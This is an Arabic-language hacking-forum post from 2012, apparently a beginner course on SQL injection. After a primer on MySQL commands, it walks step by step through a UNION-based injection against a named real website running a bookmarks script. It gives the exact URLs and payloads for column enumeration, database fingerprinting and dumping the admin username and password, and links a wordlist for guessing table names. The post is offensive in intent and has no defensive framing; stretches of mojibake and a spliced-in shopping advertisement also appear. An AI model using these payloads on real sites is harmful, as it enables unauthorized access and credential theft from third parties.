اكتشاف ثغرات sql - 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€ＲＣ๏𝕞𝕞𝓤ｎᎥᵗＹ💀

Members Login

Post Info

TOPIC: اكتشاف ثغرات sql

cYber-coder

Senior Member

Status: Offline

Posts: 317

Date: Nov 14, 2012

اكتشاف ثغرات sql	Permalink Closed

بسم الله الرحمن الرحيم الحمد لله رب العالمين والصلاه والسلام على رسول الله سيدنا محمد وعلى اله وصحبه اجمعين امابعد: +-مقدمه+- اليوم سنتكلم عن sql هي ليست لغه برمجه وانما وسيله للتفاهم مع قواعد البيانات وهي منتشره بكثره في سيرفرات العالم لانها سهله التعامل مفتوحه المصدر وايضا فعاله وليست مكلفه مثل الانواع الاخرى مثل الارواكل كما انها سهله التثبيت وتحتاج الى مساحه صغيره لكن مواقع البنوك والشركات الكبرى لاتعتمد عليها كثير لماذا؟ لانها مفتوحه المصدر يعنى كل الناس يستطيع الاطلاع عليها والتعديل عليها وكشف نقاط ضعفها ------------------------------------------------ +-هدف الدوره+- تعليم ابناء المسلمين كيفيه التعامل مع sql باحتراف واختراقها ---------------------------------------------- : إكتشاف ثغرات" /> +-اوامر الاستعلامات في sql+- كيفيه التعامل معها هناك شروط كثيره لاحتراف هذا النوع من الثغرات واهم الشروط فهم اللغه الانجليزيه لاننا بعد مانخش في التفاصيل ستجد كل الاوامر مكتوبه بكلمات انجليزيه يفهم منها الاستخراج والادخال التحميل وغيرها من مصطلحات::::: عندما تقوم بانزال برنامج الاباتشي او الجمل تستطيع التعامل مع sql بكل احتراف من اوامر لاحظ كيف ادخل واتعامل مع sql عن طريق الاباتشي او الجمل : إكتشاف ثغرات" /> من هنا نخش على الرابط بعد تنصيب برنامج الاباتشي في جهازك http://localhost/phpmyadmin/ هناك الكثير من الاستعلامات التى تهم كل شخص يحب sql ونحن نريد ان لاينحصر موضوعنا في الاختراق بل نريد ايضا ان نتكلم عن الاستعلامات والاهم فيها وانا اريد ان اسال اخواني كيف تخترق sql وانت لاتعرف تتعامل معها نبدا على بركه الله: -show databases : إكتشاف ثغرات" /> ونفس الامر استطعنا ان نعرض جداول قواعد البيانات : إكتشاف ثغرات" /> -use اسم القاعده : إكتشاف ثغرات" /> من خلال هذا الامر ندخل الى اي قاعده بيانات يحدده المستخدم -describe اسم الجدول : إكتشاف ثغرات" /> من خلال هذا الامر يعطيك الوصف الكامل للجدول او الحقل اذا كنت داخل الجدول -drop database اسم القاعده : إكتشاف ثغرات" /> بعد تنفيذ الامر تحذف قاعده البيانات للذلك احذر من استخدام هذا الامر -revoke هنا اسحب امتيازات اي يوزر عندك انا انشئت حساب باسم lord وابغا اسحب كل امتيازته استخدم الامر هذا REVOKE ALL ON * . * FROM lord : إكتشاف ثغرات" /> -grant لاعطاء الامتيازات ليوزر يستطيع الدخول لجميع قواعد البيانات من حذف او اضافه او او انا كان عندي يوزر اسمه لورد واعطيته يوزر بس بعد الامر اللى تحت اصبح مثل الروت على القواعد GRANT ALL ON * . * TO lord : إكتشاف ثغرات" /> هنا النجوم تعني كل قواعد البيانات والجدوال. -create من خلال هذا الامر انشاء قاعده بيانات واسمها so9or انظر الى الصوره حيث السهم متجه الى القاعده الجديده so9or بعد اصدار امر create : إكتشاف ثغرات" /> - من خلال الامر analyze نستطيع تحليل اي جدول من الاخطاء هذا الامر analyze table db : إكتشاف ثغرات" /> من خلال سنقوم بتحليل db انظر الى النتجيه - من خلال الامر ايضا repair تستطيع اصلاح الجدوال التالفه اذا وجدت حيث اذا ظهرت كلمه error or waring معناها ان هناك مشكله اما اذا ظهرت ok معناها ان الجدول لايوجد فيه اخطاء repair table host انظر الى الصوره تعمل عمل analyze بشكل عام انظر الى الصوره تعرف عملها : إكتشاف ثغرات" /> : إكتشاف ثغرات" /> اخوانى الاحبه هناك الكثير من الاوامر في التعامل مع sql وانا قمت بكتابه المعروفه والمنتشره ومن خلالها ستكون مدخلنا لاختراق.... +-القسم الثاني:فـــــــهم الثغرات+- اذا اردت ان تفهم ثغرات sql لابد ان تتبع الخطوات التاليه وقبل ذلك سنطبق على سكربت شهير وهو Powered by Active PHP Bookmarks v1.1.02 الثغره موجود على هذا الرابط www.milw0rm.com/exploits/6277 1-معرفه هل الثغره موجوده او لا ؟؟؟؟ تظهر الكثير من الاخطاء وتتدل على ان هناك مشكله في قاعده البيانات مثل ماهو موضح في الصور : إكتشاف ثغرات" /> الخطا موجود في هذا الملف view_group.php سنقوم بالتطبيق على هذا الموقع http://sueandpaul.com/bookmarks/view_group.php?id=-24 2- محاوله ايجاد العمود المصاب والجدول الصحيح لاستخراج المعلومات الازمه منه هذا النقطه من اهم النقاط وهو محاوله ايجاد العمود المصاب حتى تستطيع ان تستعلم بالشكل الصحيح وهناك طرق كثيره ومنها http://sueandpaul.com/bookmarks/view_group.php?id=-24 وعندما فتحنا هذي الصفحه وجدنا خطا طيب نريد ان نظهر الاعمده المصابه من خلال هذا الامر order by http://sueandpaul.com/bookmarks/view...4+order+by+50/ انا من خلال order+by+50: إكتشاف ثغرات" /> وجدت ان هذا العمود رقم خمسين لايوجد للذلك ظهر الخطأ دعونا نحاول ان نقلص العدد الى ان عدد الاعمده المصابه ثمانيه وانا اعرف مسبقن انها ثمانيه http://sueandpaul.com/bookmarks/view...24+order+by+8/ order+by+8 هنا اختفى الخطأ ورجعت الصفحه معناها اننا وجدنا الاعمده المصابه : إكتشاف ثغرات" /> وقد يصادف كثير وجود اكثر من عمود مصاب هنا وجدنا ان الخطا يكمن في العمود رقم 3 خلال العمود رقم ثلاثه باستطاعتي معرفه كم رقم اصدار القاعده وقاعده البيانات وايضا اسم المستخدم وكل الاستعلامات تضعها بعد الملف المصاب في الموقع http://sueandpaul.com/bookmarks/view_group.php?id=-24 union+select+1,2,version(),4,5,6,7,8-- هنا ظهر رقم الاصدار لل =version()sql : إكتشاف ثغرات" /> union+select+1,2,user(),4,5,6,7,8-- هنا ظهر اسم المستخدم للقاعده=user() : إكتشاف ثغرات" /> +union+select+1,2,database(),4,5,6,7,8-- هنا ظهر اسم قاعده البيانات=database() : إكتشاف ثغرات" /> كل هذي العبارات وضعناها في العمود المصاب رقم ثلاثه user()-database()-version 3-تخمين الجدول والعمود : كما نعلم الكثير من اخواننا المبتدئين يجد صعوبه في النقطه هاذي ولكن باذن الله ستكون سهله جدا معنا كما عرفنا فاننا وجدنا الخطا في العمود رقم ثلاثه اذن من خلال العمود رقم ثلاثه سنبدأ بتخمين العمود المراد سحب معلوماته واكيد اللى يهم الهاكر عمود اليوزر والباس خلك معي وحده وحده خخخخخ انا اعرف اسم عمود اليوزرات من قبل وهو username وهو في الحقل رقم ثلاثه كما هو موضح في الرابط تحت لابد ان نعرف اسم العمود واسم الجدول حتى ينجح الاستغلال view_group.php?id=-24+union+select+1,2,username,4,5,6,7,8+from+apb_us ers-- لكن اضفنا في نهايه الاستغلال apb_users وهذا اسم الجدول ونلخص كلامنا الى انا from+apb_users معنى الا ستغلال لو سمحت ي sql اريد ان ارى العمود اللى هو اليوز نيم username من جدول اليوزرات اللى هو apb_users : إكتشاف ثغرات" /> وبكذا يطلع لنا اسم الادمن لهذا السكربت كما بالصوره طيب انا عرفت اسم الادمن : إكتشاف ثغرات" /> طيب ابغا اعرف الباس حقه ولازم نخمن اذا لم نكن نعرف العمود حق الباسوردات قمنا مثلن بتخمين عمود الباس وهو password -24+union+select+1,2,password,4,5,6,7,8+from+apb_us ers-- لاحظ ظهر الباسورد طيب لو افترضنا انه طيب ابغا يكون الباس والادمن في استغلال واحد بهذا الامر استطيع ان اعرض الباس والادمن في صفحه وحده concat(password,ox3a3a,username) : إكتشاف ثغرات" /> لاحظ بعد ماعرفنا اسم عمود اليوزرات والباسورادت بالامر concat ظهرت كل المعلومات في صفحه وحده +union+select+1,2,concat(password,0x3a3a,username) ,4,5,6,7,8+from+apb_users-- 4-كتابه الاستعلام الصحيح والبعد عن الاخطاء انا انصح اخاوني عندما تريد كتابه استعلام لابد ان تركز في علامات التنصيص ولابد ان تتاكد من وجود خطا في sql فمثلا اذا اردت الاستفسار عن اكثر من عمود تكتب و (,) كذلك تسطيع كتابه + باستطاعتك كتابه او بدون لكن اترك مسافه union+select+1,2,3,4 عند الاستفسار عن قاعده بيانات او يوزر بامكانك كتابه @@ او اخر الا ستعلام)( فمثلن union select 1,2,@@database او union select 1,2,database)( من خلال هذا الرسم البياني ستعلم كيف ينجح الهاكر في اختراق sql : إكتشاف ثغرات" /> ساضع هنا رابط فيه قاموس اسماء جدوال واعمده حتى تزيد فرصه نجاح التخمين http://file5.9q9q.net/Download/68438...dlist.rar.html الموقع المشروح عليه http://sueandpaul.com/bookmarks/view_group.php?id=-24 ---------------------------------------------- +-امثله على ثغرات SQL+- -+- انا قمت بالشرح على ثغرتين بالفيديو وهي في سكربتات معروفه الفيديو الاول ظ…ط®ط²ظ† ظ…ط±ظƒط² طھطظ…ظٹظ„ ظ…ط±ظƒط² طھطظ…ظٹظ„ طµظˆط± ظ…ط±ظƒط² طھطظ…ظٹظ„ ظ…ظ„ظپط§طھ ط±ظپط¹ طµظˆط± ط±ظپط¹ ظ…ظ„ظپط§طھ color: rgb(240, 76, 19); font-family: Arial,Helvetica,sans-serif; font-size: 16px; font-weight: bold; text-align: center; padding: 6px; float: right;"> \|\|.:: إعلانات ::.\|\| أشهر مواقع الشراء العالمية التي تقبل Paypal + Credit card All Types and more* amazon - ebay - iPad - iPod nano - iPod touch - Mac OS X- iphone 4s - samsung galaxy s ii - nike - xbox 360 - kindle - lego star wars - galaxy nexus- nook - Canon - Minolta - Realtek - Dell - Bose - NVIDIA - Vizio - BOSE -Dollar Tree - Kmart - Mattel - Motorola - Nikon - Petsmart- Sheraton - Hankook - Minolta - Logitech - TomTom - Sears - stickies - Virgin Atlantic - adobe - Bose - divx - Jobing.com - Klipsch - Kmart - Lexmark - Mattel - vizio -radar detector - Behringer - Sennheiser - Advanceautoparts.com - Autozone.com - Gymboree.com - Rightstart.com - Diapers.com - Babyuniverse.com - Totsy.com - Gap.com - Carters.com - Toysrus.com -Ibuyofficesupply.com - Officedepot.com - Shoplet.com - Quill.com - Officemax.com - Cheapofficesupplies.com - Adorama.com - BHphotovideo.com - Walmart.com - Soap.com - Fragrancenet.com - Fragrancex.com -Abebooks.com Barnesandnoble.com - Abt.com - Dell.com - Hp.com - Apple.com - Tigerdirect.com - Laptoppartsexpert.com - Buy.com - Bestbuy.com - Overstock.com - Outlet.lenovo.com - Ecost.com - Insight.com -Compusa.com - Mobilepc.com - Puremobile.com - Expansys-usa.com - Kohls.com - Manoffashion.com - dsw.com - Zappos.com - athleta.com - Fredericks.com - Karmaloop.com - endless.com - الفيديو الثاني http://up5.m5zn.com/iicax7x7*7r/sql222.rar.htm ---------------------------------------------- ---------------------------------------- -+عبارات تستخدم في الا ستغلال +- لاحظ كلها كلمات انجليزيه سهله فمثلن show يظهر describe يوصف الخ الخ لذلك يجب ان يكون عندك مخزون جيد للغه حتى تصبح محترف في التعامل مع sql وايضا في لغات البرمجه الاخرى نحن دائما نجد عبارات في sql تكاد تكون موجوده في كل او اغلب عبارتها ومن خلال هذي العبارات تستطيع ان تكتب اي استعلام وتتفنن في كتابه اي استغلال : select: من هنا تستطيع استخراج بيانات الجدوال او الاعمده المقصوده في الاستعلام. from: وهذي الكلمه تعني من جدول او حقل : هذي العلامه المقصود بها بدون تحديد كل الحقول انا اعطيكم مثال للتوضيح على كل ماذكر : إكتشاف ثغرات" /> insert into: من خلال هذي العباره تستطيع تتدخل اي عمود او صف او قيمه في اي جدول في قاعده بيانات انظر الى الصوره ادرجت صفين فاضيه باستخدم الاستعلام المذكور : إكتشاف ثغرات" /> update: تستطيع ان تغير الباسورد او قيمه في جدول من خلال هذا الامر او تغير مسمى لصف او عمود : إكتشاف ثغرات" /> order by: من خلال هذا الاستعلام يفرز الاعمده والصفوف في عمود او اكثر ويقوم بترتيب النتائج هجائيا لاحظ الصوره مرتبه بشكل هجائي : إكتشاف ثغرات" /> limit:من خلال هذي العباره سنحدد كم عمود او جدول نريد فانا في استعلامي لم احدد الا عمودين باستخدام اداه limit SELECT * FROM db LIMIT 2 انظر الى الصوره لم يظهر الا صفين وذلك بسبب عباره limit 2 : إكتشاف ثغرات" /> like: هذي العباره تقوم بالبحث عن المتشابهات من كلمات انظر الى الصوره وتعلم ماهي وظيفتها unoin: هذي العباره دائما نجدها في استعلامات SQL وتعنى الربط بينها وبين select بالاستغلات الاخرى دائما نجدها مع سليكت where: هنا عندما تريد ان تستعلم عن مثلن يوزر رقم واحد في سيرفر الجمل او الا باتشي من خلال هذي العباره احدد المقصود عضو واحد او عضو 2 الخ الخ : إكتشاف ثغرات" /> null: تتدل على قيمه فارغه ليست محدده برمز اورقم او حرف : إكتشاف ثغرات" /> distinct:هذه العباره تزيل تكرار العبارات خلال الاستعلام لاحظ الصوره : إكتشاف ثغرات" /> group by: هذا الاستعلام يقوم بتحليل مجموعه من الصفوف تتضمن قيم متطابقه : إكتشاف ثغرات" /> الان فهمنا اغلب عبارات sql المعروفه والمنتشره بين الهاكر اتوقع الان لايخفى عليكم اهميه هذي العبارات في الاختراق وباذن الله ساعى اني اضيف كل ماهو جديد ومهم . هنا فيديو يوضح لك كيفيه الاستعلام عن الجدوال ظ…ط®ط²ظ† ظ…ط±ظƒط² طھطظ…ظٹظ„ ظ…ط±ظƒط² طھطظ…ظٹظ„ طµظˆط± ظ…ط±ظƒط² طھط*ظ…ظٹظ„ ظ…ظ„ظپط§طھ ط±ظپط¹ طµظˆط± ط±ظپط¹ ظ…ظ„ظپط§طھ +-كلمه كاتب الدوره+- تحيه مني الى كل هاكر مسلم يحب الله ورسوله اطلبكم طلب الدعاء لى بالهدايه وبالجنه لى ولكم يامسلمين وبالتوفيق في دنياي لي ولكم يابناء المسلمين اللهم امييييين وكلمه شكرا اقولها لاخي ابو نجم الذي اعطانا دافع للغوص في عالم sql واعضاء ترياق العرب والقراصنه العرب واخص بالذكر استاذي ابو شهد الزهراني والقناصين العرب وبيتي بيت الهاكرز واعذروني اذا كان هناك اي خطا في الشرح الشرح صراحه طويل لكن مفيد واخص بالذكر اخاوني المبتدئين والسلام عليكم ورحمه الله وبركاته ----------------------------------------------- انتهت الدوره اخوكم المحب:ل __________________

Page 1 of 1 sorted by

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse